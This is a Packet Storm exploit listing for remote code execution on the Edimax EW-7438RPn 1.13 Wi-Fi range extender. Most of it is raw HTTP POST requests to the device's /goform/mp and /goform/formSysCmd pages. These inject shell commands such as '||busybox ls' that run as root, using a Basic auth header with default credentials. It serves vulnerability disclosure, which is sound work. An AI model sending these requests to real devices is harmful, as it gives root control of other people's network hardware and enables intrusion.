Edimax EW-7438RPn 1.13 Remote Code Execution

2020-04-24T00:00:00
ID PACKETSTORM:157381
Type packetstorm
Reporter Besim Altinok
Modified 2020-04-24T00:00:00

Description

                                        
                                            `# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution  
# Date: 2020-04-23  
# Exploit Author: Besim ALTINOK  
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/  
# Version:1.13  
# Tested on: Edimax EW-7438RPn 1.13 Version  
  
------  
  
NOTE: This device configurated with root permissions. So you can run the  
command as root  
  
Here is the detail(s) of the RCE(s)  
  
1- Content of the mp.asp file  
  
<form action="/goform/mp" method="POST" name="mp">  
<input type="text" name="command" value=""> <input  
type="submit" value="GO">  
<input type="hidden" name="getID" value="">   
<input type="hidden" name="getID" value="">   
</form>  
  
RCE Detail:  
-------------------------------  
  
POST /goform/mp HTTP/1.1  
Host: 192.168.2.2  
User-Agent: Mozilla/5.0 *********************  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 25  
DNT: 1  
Authorization: Basic YWRtaW46MTIzNA==  
Connection: close  
Cookie: language=1  
Upgrade-Insecure-Requests: 1  
  
command=||busybox+ls&getID=  
  
-------------------------------  
  
2- Content of the syscmd.asp  
  
<form action=/goform/formSysCmd method=POST name="formSysCmd"><table  
border=0 width="500" cellspacing=0 cellpadding=0>  
<tr><font size=2>  
This page can be used to run target system command.</tr>  
<tr><hr size=1 noshade align=top></tr>  
<tr> <td>System Command: </td>  
<td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>  
<td> <input type="submit" value="Apply" name="apply" onClick='return  
saveClick()'></td></form>  
  
  
RCE Detail:  
-------------------------------  
  
POST /goform/formSysCmd HTTP/1.1  
Host: 192.168.2.2  
User-Agent: Mozilla/5.0 *********************  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 11  
DNT: 1  
Authorization: Basic YWRtaW46MTIzNA==  
Connection: close  
Cookie: language=1  
Upgrade-Insecure-Requests: 1  
  
sysCmd="command to here"  
`